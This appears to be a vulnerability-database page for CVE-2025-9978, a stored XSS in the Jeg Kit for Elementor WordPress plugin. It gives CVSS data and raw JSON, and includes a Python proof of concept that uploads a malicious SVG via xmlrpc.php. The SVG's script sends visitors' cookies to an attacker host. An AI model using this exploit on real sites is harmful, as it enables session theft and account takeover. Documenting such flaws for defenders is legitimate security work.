Security Vulnerability Report
CVE-2025-9978 CVSS 6.8 MEDIUM

CVE-2025-9978

Published: 2025-10-24 06:15:36
Last Modified: 2026-04-15 00:35:42

Description

The Jeg Kit for Elementor WordPress plugin before 2.7.0 does not sanitize SVG file contents when uploaded via xmlrpc.php, leading to a cross site scripting vulnerability.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Jeg Kit for Elementor < 2.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-9978 PoC - Jeg Kit for Elementor SVG XSS
Note: Requires high privilege WordPress account
"""
import requests
import base64
import sys

# Malicious SVG with XSS payload
MALICIOUS_SVG = '''<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
// Steal cookies and send to attacker server
document.location="http://attacker.com/log?cookie="+document.cookie
</script>
<rect width="100" height="100" fill="red"/>
</svg>'''


def upload_svg_via_xmlrpc(target_url, username, password):
    """
    Upload malicious SVG file via WordPress xmlrpc.php
    """
    xmlrpc_endpoint = f"{target_url}/xmlrpc.php"

    # Base64 encode the SVG content
    b64_content = base64.b64encode(MALICIOUS_SVG.encode()).decode()

    # XML-RPC request to upload file
    xmlrpc_request = '''<?xml version="1.0"?>
<methodCall>
  <methodName>wp.uploadFile</methodName>
  <params>
    <param><value><int>1</int></value></param>
    <param><value><string>{}</string></value></param>
    <param><value><string>{}</string></value></param>
    <param><value>
      <struct>
        <member>
          <name>name</name>
          <value><string>malicious.svg</string></value>
        </member>
        <member>
          <name>type</name>
          <value><string>image/svg+xml</string></value>
        </member>
        <member>
          <name>bits</name>
          <value><base64>{}</base64></value>
        </member>
      </struct>
    </value></param>
  </params>
</methodCall>'''.format(username, password, b64_content)

    try:
        response = requests.post(xmlrpc_endpoint, data=xmlrpc_request, timeout=30)
        # Note: XML-RPC faults (bad credentials, rejected upload) are also
        # returned with HTTP 200, so this only confirms the request was answered.
        if response.status_code == 200:
            print("[+] SVG file uploaded successfully via xmlrpc.php")
            print("[+] XSS payload embedded in SVG will execute when file is accessed")
            return True
        else:
            print("[-] Upload failed")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-9978.py <target_url> <username> <password>")
        sys.exit(1)
    upload_svg_via_xmlrpc(sys.argv[1], sys.argv[2], sys.argv[3])
```

References

https://wpscan.com/vulnerability/cef78a77-c66d-4d62-8d49-140ca2d04d5b/

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-9978",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-24T06:15:36.233",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Jeg Kit for Elementor WordPress plugin before 2.7.0 does not sanitize SVG file contents when uploaded via xmlrpc.php, leading to a cross site scripting vulnerability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/cef78a77-c66d-4d62-8d49-140ca2d04d5b/",
        "source": "[email protected]"
      }
    ]
  }
}
```